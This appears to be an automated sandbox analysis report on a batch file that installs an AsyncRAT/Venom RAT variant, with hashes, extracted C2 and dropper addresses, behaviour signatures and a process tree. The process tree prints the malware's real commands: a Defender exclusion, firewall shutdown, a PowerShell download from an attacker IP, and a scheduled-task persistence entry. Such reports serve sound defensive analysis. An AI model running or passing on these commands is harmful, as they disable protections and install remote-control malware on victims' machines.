Analysis

  • max time kernel: 64s
  • max time network: 65s
  • platform: windows7_x64
  • resource: win7-20240729-en
  • resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted: 25-10-2024 13:59

General

  • Target: win10.cmd
  • Size: 3KB
  • MD5: e62a670dce5171d5ffc8cdc9d1897f1e
  • SHA1: 1f1641255d816783f7eac72f7359dd886ddaa164
  • SHA256: 37e3fb24bc4ea36c7363a55ca99539a5c91aa5600739a652deb3fbbbcab9b2d5
  • SHA512: f7615a367da1bfabc4cf9fad782154342c14bca6cca448b493cc3ee0328c1267f6b91beeb6e12ece409b72429eb9bb23154aaa682cb49157867b5d3c593d4557

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • exe.dropper: http://72.5.43.223/gdHydhxad/win10.zip

Extracted

  • Family: asyncrat
  • Version: Venom RAT + HVNC + Stealer + Grabber v6.0.2
  • Botnet: Default
  • C2: 72.5.43.15:4449
  • Mutex: yezcydjwbxouz
  • Attributes
    • delay: 1
    • install: true
    • install_file: win.exe
    • install_folder: %AppData%
  • aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\win10.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "netsh advfirewall set allprofiles state off"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.nl"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2252
      • C:\Windows\system32\cscript.exe
        cscript /nologo C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\batman.cmd
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "(New-Object Net.WebClient).DownloadFile('http://72.5.43.223/gdHydhxad/win10.zip', 'C:\Users\Admin\AppData\Local\Temp/win10.zip')"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\system32\cscript.exe
            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\unzi.vbs"
            4⤵
            • Suspicious use of FindShellTrayWindow
            PID:2080
          • C:\Users\Admin\AppData\Local\Temp\runtime.exe
            "C:\Users\Admin\AppData\Local\Temp\runtime.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"' & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"'
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1084
            • C:\Windows\system32\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2548
              • C:\Windows\system32\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:1256
              • C:\Users\Admin\AppData\Roaming\win.exe
                "C:\Users\Admin\AppData\Roaming\win.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1452
          • C:\Users\Admin\AppData\Local\Temp\win10.exe
            "C:\Users\Admin\AppData\Local\Temp\win10.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Users\Admin\AppData\Local\Temp\win10.exe
              "C:\Users\Admin\AppData\Local\Temp\win10.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2960


Downloads

  • C:\Users\Admin\AppData\Local\Temp\batman.cmd
    Filesize: 480B
    MD5: 5ce986fa2a790561fd07738b25cb0eba
    SHA1: 42d06ebaf390356aea8e6830641bb3b22c24ba91
    SHA256: 88a7a91b5c198a53e6ed7ec4c269adf5765fd208bf7c9b117da255f828dd9a6b
    SHA512: acc2ba285e6ecdec0f0d40e529c1ae085f5fd6d869f08b90b5b582b68265a6509df744d635c7e5fe0309153d344a614ca628e5d51d5727c457b9b2154d6940eb

  • C:\Users\Admin\AppData\Local\Temp\runtime.exe
    Filesize: 73KB
    MD5: 4fa7b1eec1fc84eb3a13c29e5a37aae7
    SHA1: dfff9fceeb4d74d7e82f9f0a65d1889fa0f9e326
    SHA256: 5f5aa560b9b2d9f7ea3b9a4e05b9b9b35107dc78bd763000fe05f6b3f998f311
    SHA512: 5e36a5589499a3db56d78de1b66a9ee57a2972bc57bf4b915df9118fd2a584c74ba00c61531d922431b72e87f9c53585c4c1a78a2aba122a22ea5e3603aa06ba

  • C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
    Filesize: 153B
    MD5: cf980901c73aa6cfb5cc8353ee50ef87
    SHA1: 3a241bfc80ba171120893ce2354cf0019fee4c69
    SHA256: 118148188be80ffe226f269f9bc06cc4dbf048479ceca3f408ae1a16e61899e6
    SHA512: 4cdcc5dec7fe0cbf13d2c25cfbeaa47cd1da32a5acdde656059e0b02dba3691c31afa4989bf669ef590e431404d34462880e3018a041cd79671990acafa2fa22

  • C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat
    Filesize: 147B
    MD5: a0a23eb6e83f7435bda9b9f1845ed486
    SHA1: c8a3167355f7a75e9e3f99d8ba602d74009a604f
    SHA256: 205005f743cceed5e96b734d7dee1ae74c0e181f6d64ca8e2267399094289052
    SHA512: 0157301e36bbf85efa7404c1b2412ca4eb723d5bf94aad9961bf0ef89db83be9be9fd59210f3a198dfc3bc9d455e19886ffbb3734a17cb7c9c5f722f58519c20

  • C:\Users\Admin\AppData\Local\Temp\unzi.vbs
    Filesize: 443B
    MD5: e12da1d567a5f3d33452903f44ad30fe
    SHA1: 30df139b3ab3f1f050152e4566d4421149458638
    SHA256: e61f086a6d387145b79c4e220b6a0772e992923068c7e22baa3e459298b08568
    SHA512: 6e9c575cadcd2739b2b8511beb8a590744d81572331ad004097fe6d02d25412fd58425b8e70f016a79fa5495e75dd6d7c48599d3369fa0923638072a4c845ace

  • C:\Users\Admin\AppData\Local\Temp\win10.exe
    Filesize: 14.7MB
    MD5: eba7aa775fcfec357583fd4803fa60d2
    SHA1: 94a3667f7b137e305aa45fb9d2cd3578fca8255b
    SHA256: e69138b703cdc4bf16367c468b9af1b5b7b56dbe2331ca1c34b46f7bad43ffe4
    SHA512: e0b8e105faa612287b6078f932ba5dce74af5489533d29104de198638c905391c7a0009f18e02dc148ace84ff0f7e283cd307f95234ebe6c59e628e99935641f

  • C:\Users\Admin\AppData\Local\Temp\win10.zip
    Filesize: 14.5MB
    MD5: 902aa8d1b070f89752a003b87acd57a4
    SHA1: 6ee72c2177abb3ccb56993eb0c0bf3314661fe19
    SHA256: 262591e77da99450016dfd15ab19d5f84e577f567d47e15ebe4f7dbe935980ef
    SHA512: 28ce31a3bd969c66bfbe0c42eaafd2f4b0ad7d0506f04c0019138832747c733a4021cb054bfe9c43425fa675b1a73bd4ceaa3040a7b865e58af5e74c20bdb91d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 3e09c7795a644448b00c8954719457cb
    SHA1: f03cd7a656a4e3d17201e186e2ac1d766a5c14d2
    SHA256: fdd0ff4c77a1a106a621f82150db8ef3e569c2ba1a59d16a375db59b0df36391
    SHA512: 2238da47b0438d89ed32633fea8508ab400fa2d2e4e5343211ade865609b506c174d295595ae18edd552349e2b9599f9aea5452592666fe14b04bf8758559700

  • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
    Filesize: 8B
    MD5: cf759e4c5f14fe3eec41b87ed756cea8
    SHA1: c27c796bb3c2fac929359563676f4ba1ffada1f5
    SHA256: c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
    SHA512: c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

  • \??\PIPE\srvsvc
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Users\Admin\AppData\Local\Temp\_MEI19762\python310.dll
    Filesize: 1.4MB
    MD5: 08812511e94ad9859492a8d19cafa63e
    SHA1: 492b9fefb9cc5c7f80681ebfa373d48b3a600747
    SHA256: 9742af9d1154293fa4c4fc50352430c22d56e8cdc99202c78533af182d96489c
    SHA512: 6f7e41f4e2f893841329ac62315809a59a8d01ca047cb5739eb7ac1294afd4de2754549f7b1f5f9affa3397e9de379c5f6396844fc4fab9328362566225ddb8e

  • memory/1396-70-0x0000000000A10000-0x0000000000A28000-memory.dmp
    Filesize: 96KB

  • memory/1452-180-0x0000000000C20000-0x0000000000C38000-memory.dmp
    Filesize: 96KB

  • memory/2396-8-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp
    Filesize: 9.6MB

  • memory/2396-10-0x0000000002BFB000-0x0000000002C62000-memory.dmp
    Filesize: 412KB

  • memory/2396-11-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp
    Filesize: 9.6MB

  • memory/2396-9-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp
    Filesize: 9.6MB

  • memory/2396-7-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp
    Filesize: 9.6MB

  • memory/2396-4-0x000007FEF6ACE000-0x000007FEF6ACF000-memory.dmp
    Filesize: 4KB

  • memory/2396-5-0x000000001B620000-0x000000001B902000-memory.dmp
    Filesize: 2.9MB

  • memory/2396-6-0x0000000002070000-0x0000000002078000-memory.dmp
    Filesize: 32KB

  • memory/2472-17-0x000000001B690000-0x000000001B972000-memory.dmp
    Filesize: 2.9MB

  • memory/2472-18-0x00000000026E0000-0x00000000026E8000-memory.dmp
    Filesize: 32KB

  • memory/2960-165-0x000007FEF2DE0000-0x000007FEF3246000-memory.dmp
    Filesize: 4.4MB